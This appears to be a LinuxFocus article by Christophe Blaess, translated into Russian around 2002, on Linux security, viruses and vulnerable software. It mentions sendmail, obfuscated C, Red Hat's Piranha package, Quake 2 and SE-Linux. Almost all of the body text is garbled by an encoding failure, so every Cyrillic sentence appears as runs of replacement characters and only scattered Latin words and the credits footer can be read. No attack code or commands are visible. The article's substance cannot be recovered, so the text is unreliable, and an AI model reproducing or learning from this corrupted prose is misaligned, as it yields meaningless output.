������� ������ ���� � ������� ��������� (��������, sendmail) ��������� ������������ � ������� �������, ���������� ����������, ����� ����� ��������� ���������. ����� ����, ��������� ���� -- ��������������� ������� ������� �������� � �������� ����, ��� � ����������, �������������� �������� �� IOCC (International Obsfucated C Code Contest (������������� ������� �������� C-�����)). ���� ������� ����� ������� ������������ ����������.

������ ���� ������ ������������� ��� ����� ������������� �����������. ����� �������� ������������� ���������, �������� � ������ Piranha �� ������������ Red-Hat 6.2, ������� �������� ������ �� ���������. ���� Quake 2 ����� ������ ��� ���������� �� ������� ������� ����, ������������ ��������� ���������� ������.

��������� ������ ����� �����, �����, ��������� ������ ����� ������� �����������, ��� �� ���������� ���������� ����������� �����. �������� ������ -- ������������ �������. ��������, ������� SE-Linux, ��� ������ Linux, � ������� ������������ ������� ����������, �������������� NSA (���������� ������������ ������������). ������������ Linux, ����������� ��������������� ��������, �������, ��� ����� �� ������� ��������������, �� ����� �� ����� ���� ��������� � ������� �������� �����, ���������� ��������������� ��������, ������������, ����� ������� ����� ����������.

 

������

������������ ���� ������� ��������, ��������� � ���� Gnu/Linux, ��������� ��� ������ � ������: ��������� ����������� ����������� �� �������� �� �������, ������, ��������� ����� � �.�.! �� ���� ���� ���������, �� ������� ���������� � ������� ��������� � ���������������, ���������� ������������ ������������ ��������, ��������, ���� ������ ����� ������������ � ��������. ������� ����� ����� ���������� ������� ��������� �������: ���������� ����������� �����������, ��� ������ ���������� ����������; ����������� ������ ����������� ������� ������; ���������� ����������� ����������� ������ � ������������� web-������; ����������, ��� ����� ���� PGP ��� MD5 ������� ��� ����������� �������. �������� "���������" ���� �������������� �������� ������������� ����������, ��������, � ������� ��������.

����� ������� ��� ���� ���������: ��� ������� ��������� ��� ������ Linux � ������� -- ��� ���������� ���������, ����� ����������� � ���������� �������, ������������ � ���������� (������� ����������� �����) ��� ������������������� ������, �������, ���� ���������� ��� Windows ����� ���������� � ����������� ����� �� �������� Linux �� ���� �� ������. ���� ������ �������� ������� �� ��������� ������������, ������� �� ������ ��������� ����� ���������� ���������� ��������� ��� ��� �������, ������ �������� ������ ��� �������, ���� ��� ��������������� ��������������. � ����� ��������� ������� �� ������� �������� Linux, ������������ � ��������, ����� ��������������� ������ ��������� �������. ������� ����� ���������, ��� ��� ������� ����� ����� ���������� � ���� ���������� ������������ �����������.

 

������������

������� ���������� ���������� � �������, ��������� ����� � ������ ������������ ������� ����� �����. ���� ��������� �������, � ������� ��������� � ����������� �������, ��� � ��� ��� ������. ������� ����������� �� ���� ���������� ��������� DOS/Windows, �� ��������� �� ��� �������� � Linux. ������, ������������� �����, ������ ������������ � � ��� ������������� ������������� ���������.

 

�������� �������

� ������ ������� ���� �������� �������. �� ���� �������� �� ������ �������� ���� ����������� ��� ����������� ����������� ������ ��������� :
 talkback page 

Webpages maintained by the LinuxFocus Editor team
© Christophe Blaess, FDL
LinuxFocus.org
Translation information:
fr --> -- : Christophe Blaess (homepage)
en --> ru: Eugene S. Saenko <caspar(at)pisem.net>
fr --> en: Georges Tarbouriech <georges.t(at)linuxfocus.org>

2002-10-10, generated by lfparser version 2.31